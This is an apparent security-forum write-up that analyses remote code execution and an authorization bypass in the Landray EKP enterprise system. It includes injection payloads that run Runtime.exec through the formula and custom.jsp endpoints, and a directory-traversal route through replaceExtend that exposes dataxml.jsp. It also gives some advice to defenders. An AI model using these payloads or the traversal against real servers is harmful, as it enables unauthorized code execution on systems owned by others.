<div class=highlight><pre><span></span><span class=nx>s_bean</span><span class=o>=</span><span class=nx>sysFormulaSimulateByJS</span><span class=o>&amp;</span><span class=nx>script</span><span class=o>=</span><span class=kd>var</span> <span class=nx>x</span> <span class=o>=</span> <span class=nb>Function</span><span class=cm>/**/</span><span class=p>(</span><span class=s1>'return(java.lang.Runtime.getRuntime())'</span><span class=p>)();</span><span class=nx>x</span><span class=p>.</span><span class=nx>exec</span><span class=p>(</span><span class=s2>"calc.exe"</span><span class=p>);</span><span class=kd>var</span> <span class=nx>a</span> <span class=o>=</span> <span class=nx>mainOutput</span><span class=p>();</span><span class=kd>function</span> <span class=nx>mainOutput</span><span class=p>()</span> <span class=p>{};</span>
</pre></div>
<h2 id=toc-4>漏洞绕过</h2>
<p>这个洞后来加了权限校验(WEB-INF/KmssConfig/sys/authentication/spring.xml),匿名用户仅允许访问以下接口:</p>
<div class=highlight><pre><span></span><span class=nt>&lt;property</span> <span class=na>name=</span><span class=s>"anonymousPaths"</span><span class=nt>&gt;</span>
<span class=nt>&lt;value&gt;</span>
/login*.jsp*; /resource/**; /service/**; /ui-ext/**; /*/*.index; /logout*; /admin.do*;
/browser.jsp*;/third/dingrobot/dingrobotCover.do*;
/axis/*; /kk*; /forward.html*; /sys/webservice/*;
/vcode*;/sys/authentication/validate*;/ui-ext/scormcourse/**;/*.txt;
/sys/print/word/file/**;/elec/rmkk/rmkk.do*;/elec/yqq/callback.do*;/sys/person/image.jsp*;/elec/sgt/callback.do*;/hr/recruit/invite_qr_code/*;
/sysInfo*;/data/sys-attachment/sysJgWebOffice/execute;/sys/anonymous/enter/token.do*;/**/*.woff2;/**/*.woff;/**/*.ttf;/**/*.svg;/**/*.eot
<span class=nt>&lt;/value&gt;</span>
<span class=nt>&lt;/property&gt;</span>
</pre></div>
<p>还有一种打法是通过custom.jsp去SSRF打dataxml.jsp。不过这里也已经无法利用了。</p>
<div class=highlight><pre><span></span><span class=nf>POST</span> <span class=nn>/ekp/sys/ui/extend/varkind/custom.jsp</span> <span class=kr>HTTP</span><span class=o>/</span><span class=m>1.1</span>
<span class=na>Content-Type</span><span class=o>:</span> <span class=l>application/x-www-form-urlencoded</span>
var={"body":{"file":"/sys/common/dataxml.jsp"}}&amp;s_bean=sysFormulaValidate&amp;script=Runtime.getRuntime().exec("calc")&amp;type=int&amp;modelName=test
</pre></div>
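<p>在该系统 V16 版本中引入了 <code>SysUiComponent</code>,并且在 <code>design.xml</code>(WEB-INF/KmssConfig/sys/ui/design.xml)和 <code>spring.xml</code> 中忘记为其添加鉴权,导致可以未授权调用 <code>SysUiComponentAction#getThemeInfo</code> 进行文件上传。从下面贴出的 design.xml 的路径列表看,其中似乎没有针对该组件 Action 的 <code>&lt;request&gt;</code> 条目;排查同类问题时,应确认每个新增的 Action 路径都配置了角色校验。</p>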
<div class=highlight><pre><span></span><span class=cp>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class=nt>&lt;configs</span>
<span class=na>xmlns=</span><span class=s>"http://www.example.org/design-config"</span>
<span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
<span class=na>xsi:schemaLocation=</span><span class=s>"http://www.example.org/design-config ../../design.xsd "</span><span class=nt>&gt;</span>
<span class=nt>&lt;module</span>
<span class=na>messageKey=</span><span class=s>"sys-ui:module.sys.ui"</span>
<span class=na>urlPrefix=</span><span class=s>"/sys/ui/"</span>
<span class=na>defaultValidator=</span><span class=s>"true"</span><span class=nt>&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"index.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"tools.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"tree.jsp*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/font/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/component/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_BASE_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"help/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_EXT_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"demo/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"jsp/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_logo/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_extend/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;ROLE_SYSPORTAL_EXT_SETTING)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_tool/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_config/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"sys_ui_qrcode/**"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_USER)"</span> <span class=nt>/&gt;</span>
<span class=nt>&lt;request</span>
<span class=na>path=</span><span class=s>"/sys_ui_compress/sysUiCompress.do*"</span>
<span class=na>defaultValidator=</span><span class=s>"roleValidator(role=SYSROLE_ADMIN;SYSROLE_SYSADMIN)"</span><span class=nt>/&gt;</span>
<span class=nt>&lt;/module&gt;</span>
<span class=nt>&lt;/configs&gt;</span>
</pre></div>
<p>这次漏洞的绕过方式是:通过<code>SysUiComponentAction#replaceExtend()</code>将<code>dataxml.jsp</code>所在目录的文件复制到可访问的目录。</p>
<blockquote><p>借助这个漏洞,我们能够将其移动至无需鉴权的位置,也就是配置中的静态资源或者匿名路径所在之处。</p>
</blockquote>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185513-8d6b8e3c-3d18-1.png><img src="data:image/png;base64,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
<p>继续跟进,调用的是<code>SysUiComponentService#replaceExtend()</code></p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185524-945dda06-3d18-1.png><img src="data:image/png;base64,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
<p>这里获取两个参数的值,先删除<code>extendId</code>目录,然后将<code>folderName</code>目录的文件复制过来。</p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185539-9cdeaf8e-3d18-1.png><img src="data:image/png;base64,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
<p>继续跟进<code>copyDirectory</code>,得到:</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>copyDirectory</span><span class=o>(</span><span class=n>File</span> <span class=n>srcDir</span><span class=o>,</span> <span class=n>File</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>FileFilter</span> <span class=n>filter</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=c1>// 检查源目录和目标目录的有效性</span>
<span class=n>checkFileRequirements</span><span class=o>(</span><span class=n>srcDir</span><span class=o>,</span> <span class=n>destDir</span><span class=o>);</span>
<span class=c1>// 确保源是一个目录</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>srcDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Source '"</span> <span class=o>+</span> <span class=n>srcDir</span> <span class=o>+</span> <span class=s>"' exists but is not a directory"</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 确保源和目标不是同一个目录</span>
<span class=k>else</span> <span class=k>if</span> <span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>().</span><span class=na>equals</span><span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Source '"</span> <span class=o>+</span> <span class=n>srcDir</span> <span class=o>+</span> <span class=s>"' and destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' are the same"</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>else</span> <span class=o>{</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>exclusionList</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=c1>// 检查目标目录是否是源目录的子目录</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>().</span><span class=na>startsWith</span><span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=c1>// 获取源目录中的文件列表</span>
<span class=n>File</span><span class=o>[]</span> <span class=n>srcFiles</span> <span class=o>=</span> <span class=n>filter</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>?</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>()</span> <span class=o>:</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>(</span><span class=n>filter</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFiles</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>srcFiles</span><span class=o>.</span><span class=na>length</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// 创建排除列表,防止无限递归复制</span>
<span class=n>exclusionList</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>(</span><span class=n>srcFiles</span><span class=o>.</span><span class=na>length</span><span class=o>);</span>
<span class=k>for</span> <span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span> <span class=o>:</span> <span class=n>srcFiles</span><span class=o>)</span> <span class=o>{</span>
<span class=n>File</span> <span class=n>copiedFile</span> <span class=o>=</span> <span class=k>new</span> <span class=n>File</span><span class=o>(</span><span class=n>destDir</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>getName</span><span class=o>());</span>
<span class=n>exclusionList</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>copiedFile</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=c1>// 执行实际的目录复制操作</span>
<span class=n>doCopyDirectory</span><span class=o>(</span><span class=n>srcDir</span><span class=o>,</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>filter</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>exclusionList</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>继续跟进</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>doCopyDirectory</span><span class=o>(</span><span class=n>File</span> <span class=n>srcDir</span><span class=o>,</span> <span class=n>File</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>FileFilter</span> <span class=n>filter</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>exclusionList</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=c1>// 获取源目录中的文件列表,如果有过滤器则应用过滤器</span>
<span class=n>File</span><span class=o>[]</span> <span class=n>srcFiles</span> <span class=o>=</span> <span class=n>filter</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>?</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>()</span> <span class=o>:</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>(</span><span class=n>filter</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFiles</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Failed to list contents of "</span> <span class=o>+</span> <span class=n>srcDir</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 确保目标目录存在且是一个目录</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>exists</span><span class=o>())</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' exists but is not a directory"</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>mkdirs</span><span class=o>()</span> <span class=o>&amp;&amp;</span> <span class=o>!</span><span class=n>destDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' directory cannot be created"</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 确保目标目录可写</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>canWrite</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' cannot be written to"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 遍历源目录中的所有文件和子目录</span>
<span class=k>for</span><span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span> <span class=o>:</span> <span class=n>srcFiles</span><span class=o>)</span> <span class=o>{</span>
<span class=n>File</span> <span class=n>dstFile</span> <span class=o>=</span> <span class=k>new</span> <span class=n>File</span><span class=o>(</span><span class=n>destDir</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>getName</span><span class=o>());</span>
<span class=c1>// 检查是否在排除列表中</span>
<span class=k>if</span> <span class=o>(</span><span class=n>exclusionList</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>||</span> <span class=o>!</span><span class=n>exclusionList</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=n>srcFile</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFile</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=c1>// 如果是目录,递归复制</span>
<span class=n>doCopyDirectory</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>dstFile</span><span class=o>,</span> <span class=n>filter</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>exclusionList</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 如果是文件,直接复制</span>
<span class=n>doCopyFile</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>dstFile</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=c1>// 如果需要保留文件日期,设置目标目录的最后修改时间</span>
<span class=k>if</span> <span class=o>(</span><span class=n>preserveFileDate</span><span class=o>)</span> <span class=o>{</span>
<span class=n>destDir</span><span class=o>.</span><span class=na>setLastModified</span><span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>lastModified</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>doCopyFile</span><span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span><span class=o>,</span> <span class=n>File</span> <span class=n>destFile</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destFile</span><span class=o>.</span><span class=na>exists</span><span class=o>()</span> <span class=o>&amp;&amp;</span> <span class=n>destFile</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destFile</span> <span class=o>+</span> <span class=s>"' exists but is a directory"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>Path</span> <span class=n>srcPath</span> <span class=o>=</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>toPath</span><span class=o>();</span>
<span class=n>Path</span> <span class=n>destPath</span> <span class=o>=</span> <span class=n>destFile</span><span class=o>.</span><span class=na>toPath</span><span class=o>();</span>
<span class=kt>long</span> <span class=n>newLastModifed</span> <span class=o>=</span> <span class=n>preserveFileDate</span> <span class=o>?</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>lastModified</span><span class=o>()</span> <span class=o>:</span> <span class=n>destFile</span><span class=o>.</span><span class=na>lastModified</span><span class=o>();</span>
<span class=n>Files</span><span class=o>.</span><span class=na>copy</span><span class=o>(</span><span class=n>srcPath</span><span class=o>,</span> <span class=n>destPath</span><span class=o>,</span> <span class=n>StandardCopyOption</span><span class=o>.</span><span class=na>REPLACE_EXISTING</span><span class=o>);</span>
<span class=n>checkEqualSizes</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>destFile</span><span class=o>,</span> <span class=n>Files</span><span class=o>.</span><span class=na>size</span><span class=o>(</span><span class=n>srcPath</span><span class=o>),</span> <span class=n>Files</span><span class=o>.</span><span class=na>size</span><span class=o>(</span><span class=n>destPath</span><span class=o>));</span>
<span class=n>checkEqualSizes</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>destFile</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>length</span><span class=o>(),</span> <span class=n>destFile</span><span class=o>.</span><span class=na>length</span><span class=o>());</span>
<span class=n>destFile</span><span class=o>.</span><span class=na>setLastModified</span><span class=o>(</span><span class=n>newLastModifed</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
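<p>最后由<code>doCopyFile</code>调用<code>Files.copy</code>逐个复制文件(<code>REPLACE_EXISTING</code>会覆盖目标位置已有的同名文件),配合<code>doCopyDirectory</code>的递归,将一个目录及其内容完整地复制到另一个目录。从上面列出的代码看(<code>checkFileRequirements</code>的实现未列出),这条调用链只检查了源是否为目录、源与目标是否相同以及目标是否可写,没有把目标路径限制在某个固定根目录之内,因此路径是否越界只能由调用方在传入前做规范化并自行校验。</p>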
<h2 id=toc-5>路由分析</h2>
<p>通过分析配置文件 <code>/WEB-INF/KmssConfig/sys/ui/spring-mvc.xml</code>,我们可以得出以下结论:</p>
<div class=highlight><pre><span></span><span class=nt>&lt;bean</span>
<span class=na>name=</span><span class=s>"/sys/ui/sys_ui_component/sysUiComponent.do"</span>
<span class=na>class=</span><span class=s>"com.landray.kmss.sys.ui.actions.SysUiComponentAction"</span>
<span class=na>lazy-init=</span><span class=s>"true"</span>
<span class=na>parent=</span><span class=s>"KmssBaseAction"</span><span class=nt>&gt;</span>
<span class=c>&lt;!-- 配置详情省略 --&gt;</span>
<span class=nt>&lt;/bean&gt;</span>
</pre></div>
<p>访问方式</p>
<ul>
<li><strong>URL</strong>: <code>/sys/ui/sys_ui_component/sysUiComponent.do</code></li>
<li><strong>类</strong>: <code>com.landray.kmss.sys.ui.actions.SysUiComponentAction</code></li>
</ul>
<p>调用特定方法</p>
<p>要调用 <code>SysUiComponentAction</code> 类中的 <code>replaceExtend()</code> 方法,需要在URL中添加 <code>method</code> 参数:</p>
<div class=highlight><pre><span></span><span class=err>/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend</span>
</pre></div>
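<p>接下来如何构造PoC就很清晰了:只需要将<code>dataxml.jsp</code>所在的目录<code>/sys/common</code>通过目录穿越复制到匿名用户可访问的Web目录即可。对防守方而言,可在访问日志中重点排查对<code>/sys/ui/sys_ui_component/sysUiComponent.do</code>发起的、带有<code>method=replaceExtend</code>且参数(上文的<code>extendId</code>、<code>folderName</code>)中含有<code>../</code>等穿越序列的请求。</p>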
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>1 条回复</li>
</ol>
<div class="box-container post-container">
<ul class=post-info id=reply-20127>
<li>
<div class="row1 user-info clearfix">
<span class=post-info>
<a class="label label-default" href=https://xz.aliyun.com/u/48040>9h0st</a>
<span class=bbs-time>2024-07-09 17:01:14</span>
<span>来自浙江 </span>
</span>
<div class="post-content markdown-body">
<p>这些闭源系统的安装包怎么拿得到呀v
</p></div>
</div>
<hr>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:
576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha